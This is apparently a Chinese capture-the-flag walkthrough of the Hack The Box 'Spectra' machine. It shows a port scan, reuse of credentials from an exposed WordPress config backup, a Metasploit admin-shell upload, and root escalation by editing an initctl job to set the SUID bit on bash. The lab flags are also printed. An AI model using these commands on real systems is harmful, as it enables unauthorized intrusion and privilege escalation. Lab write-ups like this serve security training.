Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.229 | TCP:22,80,3306 |
$ ip='10.10.10.229'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 5247de5c374f290e8e1d886ef9234d5a (RSA)
80/tcp open http nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql?
Path Traversal && WordPress Plugins Reverse Shell
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图](https://img.4awl.net/img/66/76edf10b8067a5cb6df9f1e4cf5afd.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图")
# echo '10.10.10.229 spectra.htb'>>/etc/hosts
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图1](https://img.4awl.net/img/ed/191d431c56ed613beca2093377266d.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图1")
$ curl http://spectra.htb/testing/wp-config.php.save
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图2](https://img.4awl.net/img/bd/5ce01b4da3df2b34efeff9a0d24eda.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图2")
username:devtestpassword:devteam01
http://spectra.htb/main/
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图3](https://img.4awl.net/img/14/0fb70adf1863a5b9cdaa45f689ae31.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图3")
http://spectra.htb/main/wp-login.php
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图4](https://img.4awl.net/img/7a/097bb58189b3ae624aef5d6bb6dfee.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图4")
username:administrator
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图5](https://img.4awl.net/img/c5/f272c3c44395e9873d3b8b5f3a321f.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图5")
use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME administrator
set RHOSTS 10.10.10.229
set TARGETURI /main
set LHOST tun0
set PASSWORD devteam01
run
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图6](https://img.4awl.net/img/1e/f2e148279a1be2d4f9fb92065c0599.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图6")
$ cat /etc/autologin/passwd
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图7](https://img.4awl.net/img/f1/df0d9734ec591ecd1cd78270559ef8.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图7")
SummerHereWeCome!!
$ ssh katie@10.10.10.229
User.txt
e89d27fe195e9114ffa72ba8913a6130
Privilege Escalation:initctl
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图8](https://img.4awl.net/img/f3/9a56c5863809c68d39a5b029ddbf50.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图8")
$ scp katie@10.10.10.229:/sbin/initctl ./
initctl 是一个用于管理系统初始化进程的命令,它通常用于系统的启动、停止、重启和管理系统服务等操作
$ cd /etc/init
列出服务状态
$ sudo -u root /sbin/initctl list | grep test
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图9](https://img.4awl.net/img/8f/6f708ff4fde1bc6e757ad9e27ca96c.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图9")
$ sudo -u root /sbin/initctl stop test
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图10](https://img.4awl.net/img/8b/29346a8a4571c64af561a7206818e7.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图10")
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图11](https://img.4awl.net/img/de/cae356a2a4d805cdaf7983c8b4fa18.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图11")
description "Test node.js server"
author "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
chmod +s /bin/bash
end script
![[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图12](https://img.4awl.net/img/af/36773e7850fd36b7a7ac0180f67025.jpg "[Meachines] [Easy] Spectra WordPress Plugins Shell+initctl权限提升插图12")
$ sudo -u root /sbin/initctl start test
$ /bin/bash -p
Root.txt
d44519713b889d5e1f9e536d0c6df2fc
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
